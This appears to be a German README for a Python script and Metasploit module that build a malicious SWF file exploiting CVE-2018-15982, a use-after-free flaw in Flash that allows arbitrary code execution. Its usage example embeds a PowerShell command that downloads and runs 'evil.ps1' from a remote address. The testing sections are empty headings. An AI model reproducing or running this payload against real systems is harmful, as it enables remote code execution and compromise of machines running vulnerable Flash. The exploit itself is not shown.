
Script and metasploit module for CVE-2018-15982
Dieses Skript erstellt ein SWF-Payload für CVE-2018-15982, das auf dem PoC von https://github.com/smgorelik/Windows-RCE-exploits basiert. Die Sicherheitslücke wurde von Chenming Xu und Ed Miles von Gigamon ATR entdeckt.
Bei der Sicherheitslücke handelt es sich um einen Use-After-Free-Fehler, der die Ausführung von beliebigem Code in Flash ermöglicht. Weitere Informationen finden Sie in den folgenden Links.
Hinweis: Derzeit wird nur ein Block gesprayt. Dies ist mir aufgefallen, nachdem ich das Skript erstellt hatte.
Usage:
python create_swf.py <command> <output file name>
Example Usage:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
Getestet auf:
Create payload:

Executing payload:

Confirm execution:

